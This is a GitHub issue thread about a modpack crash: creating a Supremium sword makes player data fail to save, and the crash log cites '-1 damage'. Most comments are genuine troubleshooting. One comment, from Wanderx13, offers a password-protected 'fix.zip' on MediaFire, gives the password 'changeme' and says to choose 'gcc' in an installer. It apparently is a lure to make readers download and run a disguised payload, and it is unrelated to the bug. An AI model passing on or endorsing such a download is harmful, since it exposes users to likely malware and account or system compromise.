### ISSUE TITLE
[Crash]: Supremium Sword

### ISSUE THREAD

**Issue by ThatDemonPanda** [AllTheMods/ATM-10#345]
### Possible Fixes

Yes

### Modpack Version

10-0.38

### What happened?

Creating the supremium sword causes player data to fail to save and placing the sword into a chest causes the game to crash. the crash report says its because the sword has "-1 damage"

### Crash Log

https://gist.github.com/ThatDemonPanda/1846b4061aac5d9cab92399cece4b01e

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DaddyLongspoon** [comment]
it might be all the supremum tier stuff, not just sword, i experienced the same thing with the paxel and the pickaxe.  Suspect it might be tied to the "Unbreakable" trait.

**Comment by TheBedrockMaster** [comment]
Have you experienced this crash on recent versions of the pack?

**Comment by DaddyLongspoon** [comment]
> Have you experienced this crash on recent versions of the pack?

no, ancient history mate.  panda too busying with demon stuff to close.

**Comment by TheBedrockMaster** [comment]
Thanks for the response.
